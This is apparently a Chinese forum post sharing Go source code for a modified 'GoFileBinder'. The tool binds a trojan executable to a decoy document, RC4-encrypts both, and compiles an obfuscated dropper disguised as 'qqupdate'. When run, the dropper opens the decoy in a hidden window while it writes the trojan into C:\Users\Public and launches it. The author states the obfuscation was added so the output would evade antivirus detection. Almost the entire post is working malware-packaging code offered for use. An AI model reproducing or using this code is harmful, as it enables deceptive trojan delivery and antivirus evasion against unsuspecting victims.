利用https://github.com/Yihsiwei/GoFileBinder改了加密算法和编译混淆。最开始不加混淆是可以过的,可能是测试次数多了,后来加了混淆才能过,后面有时间再改改。
package main
import (
"crypto/rc4"
"encoding/base64"
"fmt"
"io/ioutil"
"log"
"math/rand"
"os"
"os/exec"
"path/filepath"
"strings"
"time"
)
var (
logo = `
\__ | | | |__ _____|__|_ _ __ ____ |__|
/ | | | | \ / ___/ \ \/ \/ // __ \| |
\____ | | Y \\___ \| |\ /\ ___/| |
/ ______|___|___| /____ >__| \/\_/ \___ >__|
\/ \/ \/ \/
`
tvb = "用 Yihsiwei/GoFileBinder 改了一下加密算法"
keytishi = `
首先编译好命令参数如: GoFileBinder.exe 木马.exe xxx.txt
`
)
func RandStr(length int) string {
str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
bytes := []byte(str)
result := []byte{}
rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
for i := 0; i < length; i++ {
result = append(result, bytes[rand.Intn(len(bytes))])
}
return string(result)
}
func main() {
fmt.Println(logo)
fmt.Println(tvb)
if len(os.Args) != 3 {
fmt.Println(keytishi)
return
}
mumafile := os.Args[1]
docfile := os.Args[2]
key := RandStr(16)
info, _ := ioutil.ReadFile(mumafile)
var mumafileStr string = string(info[:])
AesmumafileStr := rc4encode([]byte(mumafileStr), []byte(key))
infodoc, _ := ioutil.ReadFile(docfile)
var docfileStr string = string(infodoc[:])
AesdocfileStr := rc4encode([]byte(docfileStr), []byte(key))
SourceCode := fmt.Sprintf(`package main
import (
"crypto/rc4"
"encoding/base64"
"log"
"os"
"os/exec"
"strings"
"syscall"
)
var (
key = "%s"
mumafilename = "%s"
docfilename = "%s"
docfilenames = "%s"
docfile = "%s"
numafile = "%s"
dstFile = "\\Users\\Public\\qqupdate.DAT"
selfile, _ = os.Executable()
ddocfile = rc4decode([]byte(docfile), []byte(key))
dmumafile = rc4decode([]byte(numafile), []byte(key))
)
func main() {
panfu := selfile[0:2]
if !strings.Contains(selfile, "C:") {
dstFile = panfu + "\\qqupdate.DAT"
} else {
dstFile = panfu + dstFile
}
os.Rename(selfile, dstFile)
f2, _ := os.Create(docfilename)
_, _ = f2.Write([]byte(ddocfile))
f2.Close()
strccc, _ := os.Getwd()
cmd := exec.Command("cmd", " /c ", strccc+docfilenames)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
//cmd2.Stdout = os.Stdout
_ = cmd.Start()
var dstFilecc = "C:\\Users\\Public\\" + mumafilename
f, _ := os.Create(dstFilecc)
_, _ = f.Write([]byte(dmumafile))
f.Close()
_, err := os.Stat(dstFilecc)
if err == nil {
cmda := exec.Command(dstFilecc)
_ = cmda.Start()
}
}
// RC4解密操作
func rc4decode(str []byte, key []byte) string {
str, err := base64.StdEncoding.DecodeString(string(str))
if err != nil {
log.Fatalln(err)
}
cipher2, _ := rc4.NewCipher(key)
cipher2.XORKeyStream(str, str) // 解密后的数据直接覆盖到str中
//fmt.Printf("方法2解密后:%s \n\n", str)
return string(str)
}`, key, strings.Replace(mumafile, "\\", "\\\\", 1), strings.Replace(docfile, "\\", "\\\\", 1), "\\\\"+strings.Replace(docfile, "\\", "\\\\", 1), AesdocfileStr, AesmumafileStr)
f, _ := os.Create("qqupdate.go")
_, _ = f.Write([]byte(SourceCode))
f.Close()
exitfile("qqupdate.go")
time.Sleep(time.Duration(1) * time.Second)
batfile, _ := os.Create("qqupdate.bat")
_, _ = batfile.Write([]byte("garble -tiny -literals -seed=random build -ldflags=\"-w -s -H windowsgui\" qqupdate.go"))
//_, _ = batfile.Write([]byte("go build -trimpath -ldflags=\"-w -s -H=windowsgui\" qqupdate.go"))
batfile.Close()
exitfile("qqupdate.bat")
time.Sleep(time.Duration(1) * time.Second)
cmd := exec.Command("qqupdate.bat")
_ = cmd.Start()
exitfile("qqupdate.exe")
os.RemoveAll("qqupdate.go")
os.RemoveAll("qqupdate.bat")
}
func exitfile(filename string) {
for {
time.Sleep(time.Duration(1) * time.Second)
_, err := os.Stat(GetCurrentDirectory() + "/" + filename)
if err == nil {
break
}
}
}
func GetCurrentDirectory() string {
dir, err := filepath.Abs(filepath.Dir(os.Args[0]))
if err != nil {
log.Fatal(err)
}
return strings.Replace(dir, "\\", "/", -1)
}
// RC4加密操作
func rc4encode(str []byte, key []byte) string {
//fmt.Printf("方法2加密前:%s \n", str)
cipher1, _ := rc4.NewCipher(key)
cipher1.XORKeyStream(str, str) // 加密后的数据直接覆盖到str中
encodeString := base64.StdEncoding.EncodeToString([]byte(str))
//fmt.Printf("方法2加密后:%x \n", encodeString)
return string(encodeString)
}
哇,大佬不愧是大佬,真羡慕大佬的实力www